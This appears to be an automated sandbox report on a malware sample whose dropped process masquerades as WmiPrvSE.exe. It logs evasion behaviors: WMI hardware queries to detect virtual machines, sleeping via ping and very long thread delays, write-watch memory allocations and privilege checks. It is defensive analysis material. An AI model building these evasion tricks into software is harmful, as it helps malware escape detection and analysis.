Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Memory allocated: 1370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Memory allocated: 1AF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1AE00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1230000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1B040000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: B80000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1A5E0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: E10000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1A9F0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1880000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1B220000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 2C60000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1AD00000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 17C0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1B410000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: E80000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1AA40000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1170000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1ABE0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: E50000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1AC40000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 19E0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1B410000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477

Found evasive API chain checking for process token information

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe TID: 7692	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7968	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7904	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7236	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 4600	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7648	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7988	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 1196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7200	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 5436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 6952	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 4432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7620	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 3228	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7784	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 2792	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 3488	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 2936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 2920	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 3848	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 5852	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B8BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00B8BA94
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B9D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00B9D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009EBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	3_2_009EBA94
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009FD420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	3_2_009FD420

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B9F82F VirtualQuery,GetSystemInfo,

0_2_00B9F82F

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: w32tm.exe, 0000002E.00000002.2487819773.000001B9C87D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: WmiPrvSE.exe, 0000003F.00000002.2838141608.000000001C0B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#4&\|
Source: WmiPrvSE.exe, 0000000F.00000002.1919315964.000000001BC10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
